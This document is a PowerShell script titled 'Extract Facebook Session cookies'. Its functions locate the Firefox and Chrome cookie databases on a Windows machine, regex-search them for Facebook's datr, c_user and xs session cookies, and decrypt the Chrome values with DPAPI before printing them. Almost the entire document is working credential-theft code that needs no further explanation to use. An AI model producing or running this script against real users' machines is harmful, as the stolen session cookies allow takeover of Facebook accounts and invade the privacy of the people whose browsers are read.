Extract Facebook Session cookies

1. # Instructions: import the module, then perform the commanded needed.
2.  
3. # Chrome Facebook cookies extraction
4. # Use: Get-FacebookCreds [path to Login Data]
5. # Path is optional, use if automatic search doesn't work
6.  
7. function Get-FacebookCreds-Firefox() {
8.     Param(
9.         [String]$Path
10.     )
11.  
12.     if ([String]::IsNullOrEmpty($Path)) {
13.         # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
14.         $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
15.     }
16.  
17.     if (![system.io.file]::Exists($Path))
18.     {
19.         Write-Error 'Firefox db file doesnt exist, or invalid file path specified.'
20.         Break
21.     }
22.  
23.     Add-Type -AssemblyName System.Security
24.     # Credit to Matt Graber for his technique on using regular expressions to search for binary data
25.     $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
26.     $Encoding = [system.Text.Encoding]::GetEncoding(28591)
27.     $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
28.     $BinaryText = $StreamReader.ReadToEnd()
29.     $StreamReader.Close()
30.     $Stream.Close()
31.  
32.     # First the magic bytes for the facebook string, datr size is 24
33.     $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
34.     $PwdMatches = $PwdRegex.Matches($BinaryText)
35.     $datr = $PwdMatches.groups[1]
36.  
37.     "datr is $datr"
38.  
39.     # First the magic bytes for the facebook string, c_user size is 15
40.     $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
41.     $PwdMatches = $PwdRegex.Matches($BinaryText)
42.     $c_user = $PwdMatches.groups[1]
43.  
44.     "c_user is $c_user"
45.  
46.     # First the magic bytes for the facebook string, xs size is 44
47.     $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
48.     $PwdMatches = $PwdRegex.Matches($BinaryText)
49.     $xs = $PwdMatches.groups[1]
50.  
51.     "xs is $xs"
52. }
53.  
54. function Get-FacebookCreds-Chrome() {
55.     Param(
56.         [String]$Path
57.     )
58.  
59.     if ([String]::IsNullOrEmpty($Path)) {
60.         $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
61.     }
62.  
63.     if (![system.io.file]::Exists($Path))
64.     {
65.         Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
66.         Break
67.     }
68.  
69.     Add-Type -AssemblyName System.Security
70.     # Credit to Matt Graber for his technique on using regular expressions to search for binary data
71.     $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
72.     $Encoding = [system.Text.Encoding]::GetEncoding(28591)
73.     $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
74.     $BinaryText = $StreamReader.ReadToEnd()
75.     $StreamReader.Close()
76.     $Stream.Close()
77.  
78.     # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
79.     $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
80.     $PwdMatches = $PwdRegex.Matches($BinaryText)
81.  
82.     # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
83.     $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
84.     $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
85.     $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
86.  
87.     "datr is $DecPwd"
88.  
89.     # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
90.     $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
91.     $PwdMatches = $PwdRegex.Matches($BinaryText)
92.  
93.     # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
94.     $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
95.     $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
96.     $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
97.  
98.     "c_user is $DecPwd"
99.  
100.     # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
101.     $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
102.     $PwdMatches = $PwdRegex.Matches($BinaryText)
103.  
104.     # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
105.     $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
106.     $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
107.     $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
108.  
109.     "xs is $DecPwd"
110. }